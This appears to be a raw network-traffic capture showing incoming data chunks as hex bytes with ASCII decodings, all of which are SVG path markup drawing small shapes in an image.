                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4150INData Raw: 34 30 2e 34 35 2c 32 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 34 30 2e 31 39 2c 32 32 31 2e 32 39 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 40.45,229a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M740.19,221.29a1.92,1.92,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4166INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 30 2e 30 35 2c 31 31 32 2e 34 36 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 35 39 2e 37 39 2c 31 30 34
                                                                                                                                                                                                                                                                          Data Ascii: 2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M760.05,112.46a1.92,1.92,0,0,1-.87,2.49,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M759.79,104
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4182INData Raw: 4d 36 36 31 2e 31 36 2c 33 38 31 2e 31 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 36 31 2e 32 33 2c 33 37 32 2e 34 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: M661.16,381.13a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M661.23,372.45a2.16,2.16,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4198INData Raw: 32 33 33 2e 38 31 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 39 2c 32 32 35 2e 31 33 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e
                                                                                                                                                                                                                                                                          Data Ascii: 233.81a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M689,225.13a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4214INData Raw: 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2e 34 33 2c 33 32 30 2e 39 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73
                                                                                                                                                                                                                                                                          Data Ascii: -4.13-1.35,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path class="cls-9" d="M723.43,320.92a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.64,2.64,0,0,1,0,3.57"></path><path clas
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4230INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 38 36 2c 34 31 36 2e 37 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 39 33 2c 34 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,3.61.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M757.86,416.72a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M757.93,408a2.15,2.15,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4246INData Raw: 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 36 32 2c 32 36 39 2e 33 39 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4262INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4278INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                                          Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4294INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4438INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4454INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                                                                                                                          Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4470INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4486INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4502INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                                                                                                                          Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4518INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                                                                                                                          Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:36 UTC4534INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                                                                                                                          Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
